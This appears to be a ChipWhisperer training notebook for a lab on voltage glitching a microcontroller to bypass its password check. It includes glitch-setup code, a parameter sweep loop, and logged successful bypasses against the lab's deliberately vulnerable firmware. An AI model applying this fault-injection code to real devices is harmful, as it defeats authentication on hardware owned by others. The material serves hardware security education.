# Part 2, Topic 2: Voltage Glitching to Bypass Password

---
NOTE: This lab references some (commercial) training material on [ChipWhisperer.io](https://www.ChipWhisperer.io). You can freely execute and use the lab per the open-source license (including using it in your own courses if you distribute similarly), but you must maintain notice about this source location. Consider joining our training course to enjoy the full experience.

---

**SUMMARY:** *We've seen how voltage glitching can be used to corrupt calculations, just like clock glitching. Let's continue on and see if it can also be used to break past a password check.*

**LEARNING OUTCOMES:**

* Applying previous glitch settings to new firmware
* Checking for success and failure when glitching

## Firmware

Again, we've already covered this lab, so it'll be mostly up to you!

In [79]:
SCOPETYPE = 'OPENADC'
PLATFORM = 'CWLITEARM'

In [80]:
%%bash -s "$PLATFORM"
cd ../../../hardware/victims/firmware/simpleserial-glitch
make PLATFORM=$1 CRYPTO_TARGET=NONE

SS_VER set to SS_VER_1_1
rm -f -- simpleserial-glitch-CWLITEARM.hex
rm -f -- simpleserial-glitch-CWLITEARM.eep
rm -f -- simpleserial-glitch-CWLITEARM.cof
rm -f -- simpleserial-glitch-CWLITEARM.elf
rm -f -- simpleserial-glitch-CWLITEARM.map
rm -f -- simpleserial-glitch-CWLITEARM.sym
rm -f -- simpleserial-glitch-CWLITEARM.lss
rm -f -- objdir/*.o
rm -f -- objdir/*.lst
rm -f -- simpleserial-glitch.s simpleserial.s stm32f3_hal.s stm32f3_hal_lowlevel.s stm32f3_sysmem.s
rm -f -- simpleserial-glitch.d simpleserial.d stm32f3_hal.d stm32f3_hal_lowlevel.d stm32f3_sysmem.d
rm -f -- simpleserial-glitch.i simpleserial.i stm32f3_hal.i stm32f3_hal_lowlevel.i stm32f3_sysmem.i
.
Welcome to another exciting ChipWhisperer target build!!
arm-none-eabi-gcc.exe (GNU Tools for ARM Embedded Processors 6-2017-q1-update) 6.3.1 20170215 (release) [ARM/embedded-6-branch revision 245512]
Copyright (C) 2016 Free Software Foundation, Inc.
This is free software; see the source for copying conditions.  There is NO
warr

In [81]:
%run "../../Helper_Scripts/Setup_Generic.ipynb"

INFO: Caught exception on reconnecting to target - attempting to reconnect to scope first.
INFO: This is a work-around when USB has died without Python knowing. Ignore errors above this line.


Traceback (most recent call last):
  File "c:\users\adewar\code\chipwhisperer\software\chipwhisperer\hardware\naeusb\naeusb.py", line 283, in txrx
    self.usbdev().ctrl_transfer(payload[0], payload[1], payload[2], payload[3], payload[5:], timeout=self._timeout)
  File "C:\Users\adewar\Downloads\WPy64-3760\python-3.7.6.amd64\lib\site-packages\usb\core.py", line 1043, in ctrl_transfer
    self.__get_timeout(timeout))
  File "C:\Users\adewar\Downloads\WPy64-3760\python-3.7.6.amd64\lib\site-packages\usb\backend\libusb0.py", line 593, in ctrl_transfer
    timeout
  File "C:\Users\adewar\Downloads\WPy64-3760\python-3.7.6.amd64\lib\site-packages\usb\backend\libusb0.py", line 431, in _check
    raise USBError(errmsg, ret)
usb.core.USBError: [Errno None] b'libusb0-dll:err [control_msg] sending control message failed, win error: The device does not recognize the command.\r\n\n'


Serial baud rate = 38400
INFO: Found ChipWhisperer😍


In [82]:
fw_path = "../../../hardware/victims/firmware/simpleserial-glitch/simpleserial-glitch-{}.hex".format(PLATFORM)
cw.program_target(scope, prog, fw_path)

Serial baud rate = 115200
Detected known STMF32: STM32F302xB(C)/303xB(C)
Extended erase (0x44), this can take ten seconds or more
Attempting to program 5287 bytes at 0x8000000
STM32F Programming flash...
STM32F Reading flash...
Verified flash OK, 5287 bytes
Serial baud rate = 38400


In [83]:
# ###################
# Add your code here
# ###################
#raise NotImplementedError("Add your code here, and delete this.")

# ###################
# START SOLUTION
# ###################
if PLATFORM == "CWLITEXMEGA":
    scope.clock.clkgen_freq = 32E6
    target.baud = 38400*32/7.37
    def reboot_flush():            
        scope.io.pdic = False
        time.sleep(0.1)
        scope.io.pdic = "high_z"
        time.sleep(0.1)
        #Flush garbage too
        target.flush()
else:
    scope.clock.clkgen_freq = 24E6
    target.baud = 38400*24/7.37
    def reboot_flush():            
        scope.io.nrst = False
        time.sleep(0.05)
        scope.io.nrst = True
        time.sleep(0.05)
        #Flush garbage too
        target.flush()
        
# ###################
# END SOLUTION
# ###################

Serial baud rate = 125047.48982360923


In [84]:
#Do glitch loop
reboot_flush()
pw = bytearray([0x74, 0x6F, 0x75, 0x63, 0x68])
target.simpleserial_write('p', pw)

val = target.simpleserial_read_witherrors('r', 1)#For loop check
valid = val['valid']
if valid:
    response = val['payload']
    raw_serial = val['full_response']
    error_code = val['rv']

print(val)

{'valid': True, 'payload': CWbytearray(b'01'), 'full_response': 'r01\n', 'rv': 1}


In [85]:
# ###################
# Add your code here
# ###################
#raise NotImplementedError("Add your code here, and delete this.")

# ###################
# START SOLUTION
# ###################
scope.adc.timeout = 0.1
if PLATFORM == "CWLITEXMEGA":
    def reboot_flush():            
        scope.io.pdic = False
        time.sleep(0.1)
        scope.io.pdic = "high_z"
        time.sleep(0.1)
        #Flush garbage too
        target.flush()
else:
    def reboot_flush():            
        scope.io.nrst = False
        scope.io.nrst = True

scope.glitch.clk_src = "clkgen" # set glitch input clock
scope.glitch.output = "glitch_only" # glitch_out = clk ^ glitch
scope.glitch.trigger_src = "ext_single" # glitch only after scope.arm() called
if PLATFORM == "CWLITEXMEGA":
    scope.io.glitch_lp = True
    scope.io.glitch_hp = True
elif PLATFORM == "CWLITEARM":
    scope.io.glitch_lp = True
    scope.io.glitch_hp = True
elif PLATFORM == "CW308_STM32F3":
    scope.io.glitch_hp = True
    scope.io.glitch_lp = True
    

# ###################
# END SOLUTION
# ###################

In [87]:
import matplotlib.pylab as plt
import chipwhisperer.common.results.glitch as glitch
gc = glitch.GlitchController(groups=["success", "reset", "normal"], parameters=["width", "offset", "ext_offset"])
gc.display_stats()

IntText(value=0, description='success count:', disabled=True)

IntText(value=0, description='reset count:', disabled=True)

IntText(value=0, description='normal count:', disabled=True)

FloatSlider(value=0.0, continuous_update=False, description='width setting:', disabled=True, max=10.0, readout…

FloatSlider(value=0.0, continuous_update=False, description='offset setting:', disabled=True, max=10.0, readou…

FloatSlider(value=0.0, continuous_update=False, description='ext_offset setting:', disabled=True, max=10.0, re…

In [91]:
from importlib import reload
import chipwhisperer.common.results.glitch as glitch
from tqdm.notebook import tqdm
import re
import struct
# ###################
# Add your code here
# ###################
#raise NotImplementedError("Add your code here, and delete this.")

# ###################
# START SOLUTION
# ###################

g_step = 0.4
if PLATFORM=="CWLITEXMEGA":
    gc.set_range("width", 44.7, 47.8)
    gc.set_range("offset", 2.8, 10)
    gc.set_range("ext_offset", 11, 31)
    scope.glitch.repeat = 3
elif PLATFORM == "CWLITEARM":
    gc.set_range("width", 36.7, 40)
    gc.set_range("offset", -47.8, -40)
    gc.set_range("ext_offset", 11, 31)
    scope.glitch.repeat = 5
elif PLATFORM == "CW308_STM32F3":
    gc.set_range("width", 47.2, 50)
    gc.set_range("offset", -48.65, -47.65)
    gc.set_range("ext_offset", 11, 31)
    scope.glitch.repeat = 3
gc.set_global_step(g_step)


scope.adc.timeout = 0.1

reboot_flush()
sample_size = 1


for glitch_settings in gc.glitch_values():
    scope.glitch.offset = glitch_settings[1]
    scope.glitch.width = glitch_settings[0]
    scope.glitch.ext_offset = glitch_settings[2]
    if scope.adc.state:
        # can detect crash here (fast) before timing out (slow)
        print("Trigger still high!")
        gc.add("reset", (scope.glitch.width, scope.glitch.offset, scope.glitch.ext_offset))
        #plt.plot(lwid, loff, 'xr', alpha=1)
        #fig.canvas.draw()

        #Device is slow to boot?
        reboot_flush()

    scope.arm()
    target.simpleserial_write('p', bytearray([0]*5))
    scope.io.glitch_hp = False
    scope.io.glitch_hp = True
    scope.io.glitch_lp = False
    scope.io.glitch_lp = True
    ret = scope.capture()

    val = target.simpleserial_read_witherrors('r', 1)#For loop check
    if ret:
        print('Timeout - no trigger')
        gc.add("reset", (scope.glitch.width, scope.glitch.offset, scope.glitch.ext_offset))

        #Device is slow to boot?
        reboot_flush()

    else:
        if val['valid'] is False:
            gc.add("reset", (scope.glitch.width, scope.glitch.offset, scope.glitch.ext_offset))
            #plt.plot(scope.glitch.width, scope.glitch.offset, 'xr', alpha=1)
            #fig.canvas.draw()
        else:
            if val['rv'] == 1: #for loop check
                gc.add("success", (scope.glitch.width, scope.glitch.offset, scope.glitch.ext_offset))
                print(val)
                print(val['payload'])
                print(scope.glitch.width, scope.glitch.offset, scope.glitch.ext_offset)
                print("🐙", end="")
            else:
                gc.add("normal", (scope.glitch.width, scope.glitch.offset, scope.glitch.ext_offset))

Trigger still high!


Trigger still high!


Trigger still high!
{'valid': True, 'payload': CWbytearray(b'01'), 'full_response': 'r01\n', 'rv': 1}
CWbytearray(b'01')
36.71875 -47.65625 16
🐙{'valid': True, 'payload': CWbytearray(b'01'), 'full_response': 'r01\n', 'rv': 1}
CWbytearray(b'01')
36.71875 -47.65625 16
🐙

Trigger still high!


Trigger still high!


...

Trigger still high!


Trigger still high!
{'valid': True, 'payload': CWbytearray(b'01'), 'full_response': 'r01\n', 'rv': 1}
CWbytearray(b'01')
36.71875 -47.265625 16
🐙{'valid': True, 'payload': CWbytearray(b'01'), 'full_response': 'r01\n', 'rv': 1}
CWbytearray(b'01')
36.71875 -47.265625 16
🐙

Trigger still high!


Trigger still high!


KeyboardInterrupt: 